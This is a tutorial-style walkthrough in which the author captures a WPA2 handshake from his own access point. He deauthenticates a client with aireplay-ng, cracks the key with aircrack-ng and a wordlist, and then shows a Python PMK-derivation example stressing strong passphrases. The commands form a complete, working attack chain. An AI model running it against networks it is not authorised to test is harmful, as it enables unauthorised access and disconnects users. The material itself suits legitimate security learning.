Wifi Hacking Part 1
WPA Handshake
A WPA handshake is the series of frames exchanged between an AP and a client when the client authenticates to the network. Once captured, these frames can be attacked offline with various tools, and a successful crack yields the Wi-Fi password for that network. I ran `sudo airmon-ng start INTERFACE` (which creates the wlan0mon monitor-mode interface used below) before starting this attack chain.
I started off with a basic capture to see what APs are around. I have an access point named Zon that I will be targeting.
```text
sudo airodump-ng wlan0mon
CH 8 ][ Elapsed: 0 s ][ 2023-04-28 22:17
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
34:98:B5:47:AB:AE -1 0 0 0 8 -1 <length: 0>
34:98:B5:3E:51:A0 -52 3 0 0 9 130 WPA2 CCMP PSK Woot
60:38:E0:93:28:43 -60 1 0 0 7 130 WPA2 CCMP PSK Dog
30:46:9A:A6:34:76 -27 5 0 0 1 130 WPA2 CCMP PSK Zon
D2:B4:F7:BE:12:DA -63 2 0 0 1 360 WPA2 CCMP PSK <length: 0>
5C:64:8E:BB:B3:31 -65 3 0 0 1 405 WPA2 CCMP PSK SUMMER
5C:64:8E:BB:B4:75 -65 4 0 0 1 405 WPA2 CCMP PSK Snow
```
Handshake Capture With De-Auth
One way to capture a WPA handshake is to de-authenticate a client that is already connected. In the snip below I ran airodump-ng against the BSSID of my router (`--bssid 30:46:9A:A6:34:76`), on channel 1 (`-c 1`), writing the capture to a file named zon.cap (`-w zon.cap`). The output shows one client connected to the Zon AP and sending frames.
```text
sudo airodump-ng wlan0mon --bssid 30:46:9A:A6:34:76 -c 1 -w zon.cap
CH 1 ][ Elapsed: 2 mins ][ 2023-04-28 21:45 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
30:46:9A:A6:34:76 -16 100 1357 1511 0 1 130 WPA2 CCMP PSK Zon
BSSID STATION PWR Rate Lost Frames Notes Probes
30:46:9A:A6:34:76 FC:77:74:8E:3F:B4 -26 24e- 6e 0 1622 PMKID
```
One option for getting the WPA handshake is to wait until the client disconnects and reconnects on its own. That could happen if the device leaves the AP's range and comes back, if it reboots, or for any other reason that triggers a new WPA handshake. Another option is to use aireplay-ng to send DeAuth frames that tell the AP to disconnect the client. To do this, keep the airodump-ng capture running and send a DeAuth frame; the snip below shows exactly that. aireplay-ng sends a DeAuth (`-0 1`) to my access point (`-a 30:46:9A:A6:34:76`), for the connected host (`-c FC:77:74:8E:3F:B4`), on the wlan0mon interface.
```text
┌──(zonifer㉿linux)-[~]
└─$ sudo aireplay-ng -0 1 -a 30:46:9A:A6:34:76 -c FC:77:74:8E:3F:B4 wlan0mon
21:44:50 Waiting for beacon frame (BSSID: 30:46:9A:A6:34:76) on channel 1
21:44:50 Sending 64 directed DeAuth (code 7). STMAC: [FC:77:74:8E:3F:B4] [ 0|42 ACKs]
```
Back in the airodump-ng output, the top line now shows WPA handshake: 30:46:9A:A6:34:76, signifying that a new handshake has been captured. I successfully de-authenticated the host and captured the handshake when it reconnected.
```text
CH 1 ][ Elapsed: 2 mins ][ 2023-04-28 21:45 ][ **WPA handshake: 30:46:9A:A6:34:76**
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
30:46:9A:A6:34:76 -16 100 1357 1511 0 1 130 WPA2 CCMP PSK Zon
BSSID STATION PWR Rate Lost Frames Notes Probes
30:46:9A:A6:34:76 FC:77:74:8E:3F:B4 -26 24e- 6e 0 1622 PMKID
```
Sticking with the aircrack-ng suite, I'll use aircrack-ng with a custom word list (`-w wordlist.txt`, a small cut of rockyou), the ESSID Zon (`-e Zon`), the BSSID (`-b 30:46:9A:A6:34:76`), and the recent capture file zon.cap-01.cap (airodump-ng appends -01 to the name given with -w). In just a short amount of time the handshake is cracked and the Wi-Fi password is found.
```text
sudo aircrack-ng -w wordlist.txt -e Zon -b 30:46:9A:A6:34:76 zon.cap-01.cap
Aircrack-ng 1.6
[00:00:00] 8/102 keys tested (100.82 k/s)
Time left: 0 seconds 7.84%
KEY FOUND! [ Zonifer1 ]
Master Key : 8C 29 D8 06 12 FE 70 86 7D 7E 48 6F 09 9C 6B BC
14 11 C0 96 EE DA 4B FC B4 65 DA 6E AE 08 B5 FC
Transient Key : 1D F2 27 91 A5 35 41 CE FD 8B 69 C5 26 75 3A 07
2A 79 8E 77 0C 01 CB 20 29 FB 0B 1B C8 3A 42 96
64 F1 16 2A 83 20 8F 75 63 A8 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : BB 06 27 45 F6 9E 24 3F 76 AF 24 93 6A 3C 61 51
```
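To show what the Master Key line in that output is, and why a wordlist passphrase falls in seconds, here is an added example (not from this post or the aircrack-ng project) that derives the WPA2-PSK Pairwise Master Key the same way: PBKDF2-HMAC-SHA1 over the passphrase and SSID, 4096 rounds, 32 bytes. It checks the derivation against the published IEEE 802.11 test vector; the mini wordlist and the 100.82 k/s throughput figure are constructed sample inputs, the latter taken from the aircrack-ng output above.

```python
import hashlib


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA2-PSK Pairwise Master Key (PMK) from passphrase and SSID.

    This is the value aircrack-ng reports as "Master Key". IEEE 802.11 defines
    PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def pmk_matches(passphrase: str, ssid: str, pmk_hex: str) -> bool:
    """True if the candidate passphrase reproduces a known PMK for this SSID.

    The 4096 PBKDF2 rounds are the only expensive step per wordlist entry; the
    captured four-way handshake supplies the nonces and MACs that let the
    result be confirmed against the EAPOL MIC ("EAPOL HMAC" in the output).
    """
    return wpa2_pmk(passphrase, ssid) == bytes.fromhex(pmk_hex)


def seconds_to_exhaust(keyspace: int, keys_per_second: float) -> float:
    """Worst-case time to try every passphrase in a keyspace at a given rate."""
    return keyspace / keys_per_second


# Published IEEE 802.11 test vector for the PSK derivation.
IEEE_SSID = "IEEE"
IEEE_PASSPHRASE = "password"
IEEE_PMK_HEX = ("f42c6fc52df0ebef9ebb4b90b38a5f90"
                "2e83fe1b135a70e23aed762e9710a12e")

# Rate observed in the aircrack-ng output above (100.82 k/s on one CPU).
OBSERVED_RATE = 100_820.0

if __name__ == "__main__":
    # Constructed mini wordlist standing in for the "small rockyou" file.
    wordlist = ["123456", "letmein", "password", "Zonifer1"]
    hits = [w for w in wordlist if pmk_matches(w, IEEE_SSID, IEEE_PMK_HEX)]
    print("wordlist entries matching the IEEE vector:", hits)
    # An 8-character lowercase+digit passphrase space is 36**8 candidates.
    print("seconds to exhaust 36^8 at the observed rate: "
          f"{seconds_to_exhaust(36 ** 8, OBSERVED_RATE):.0f}")
```

The contrast is the whole lesson: a passphrase that is in a wordlist costs one PBKDF2 call to find, while even a short random one pushes the same loop out to months at this rate.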